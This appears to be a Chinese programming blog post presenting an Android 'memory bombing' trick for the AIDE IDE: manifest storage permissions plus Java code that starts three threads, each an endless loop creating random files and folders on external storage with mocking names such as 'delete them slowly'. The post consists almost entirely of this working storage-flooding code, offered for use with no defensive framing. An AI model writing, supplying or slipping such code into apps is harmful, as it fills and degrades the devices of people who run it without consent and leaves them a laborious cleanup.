//权限代码添加在AndroidManifest.xml
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"></uses-permission>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"></uses-permission>
//声明添加在MainActivity.java
public String path=Environment.getExternalStorageDirectory ( ).getAbsolutePath()+ "/坤少AlDE教程";
Random a=new Random();
String[] buff=new String[]{"z","x","c","v","b","n","m","a","s","d","f","g","h","j","k","l","q","w","e","r","t","y","u","i","o","p","内","sj|","jx|","dj|,","d=|||","dj","djm","ksl","nwnd","wh","bdb","jdjd","djdjjd","whhd","androidm",".aidei","md","le","坤少AlDE教程","kdl","shncnd","djfnndndj","=}(=","+!-","","华东交大","快高考","刚离开的","管理科","风马牛的","放开那的","1","2","3","4","5","6","7","8","9","0",".","=","{","=;","放假的就","大家阿胶","大酒店看","封口费","累死","地方","大街","大酒店"};
//添加在MainActivity.java
new Thread(){
public void run()
{
//死循环
while(true)
{
int te=a.nextInt();
File d=new File(path+Integer.toString(te)+".我看好你呦");
if(!d.exists())
{
try
{
//创建文件
d.createNewFile ( );
}
catch (IOException e)
{}
}
File dx=new File(path+Integer.toString(te));
dx.mkdir();
}
}
}.start();
new Thread(){
public void run()
{
//死循环
while(true)
{
int te=a.nextInt();
File d=new File(path+Integer.toString(te+te)+".加油");
if(!d.exists())
{
try
{
//创建文件
d.createNewFile ( );
}
catch (IOException e)
{}
}
File dx=new File(path+Integer.toString(te+te));
dx.mkdir();
}
}
}.start();
new Thread(){
public void run()
{
//死循环
while(true)
{
int te=a.nextInt(79);
int te1=a.nextInt(79);
int te2=a.nextInt(79);
int te3=a.nextInt(79);
String bua=buff[te].toString()+buff[te1].toString();
String bua2=buff[te2].toString()+buff[te3].toString();
File d=new File(path+Integer.toString(te+te3)+".");
File d1=new File(path+bua+".啦啦1");
File d2=new File(path+bua2+".啦啦啦");
File d3=new File(path+Integer.toString( bua2.hashCode())+".啦啦啦");
File d4=new File(path+Integer.toHexString( bua2.hashCode())+".慢慢删");
if(!d.exists())
{
try
{
//创建文件
d.createNewFile ( );
}
catch (IOException e)
{}
}
File dd=new File(path+Integer.toString(te+te3));
dd.mkdir();
if(!d1.exists())
{
try
{
//创建文件
d1.createNewFile ( );
}
catch (IOException e)
{}
}
File d11=new File(path+bua+"坤少AlDE教程");
d11.mkdir();
if(!d2.exists())
{
try
{
//创建文件
d2.createNewFile ( );
}
catch (IOException e)
{}
}
File d22=new File(path+bua2+" 啦啦啦");
d22.mkdir();
if(!d3.exists())
{
try
{
//创建文件
d3.createNewFile ( );
}
catch (IOException e)
{}
}
File d33=new File(path+Integer.toString( bua2.hashCode())+"啦啦啦");
d33.mkdir();
if(!d4.exists())
{
try
{
//创建文件
d4.createNewFile ( );
}
catch (IOException e)
{}
}
File d44=new File(path+Integer.toHexString( bua2.hashCode())+"慢慢删");
d44.mkdir();
}
}
}.start();
今天的文章 AlDE 内存轰炸分享到此就结束了,感谢您的阅读。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/bian-cheng-ji-chu/96945.html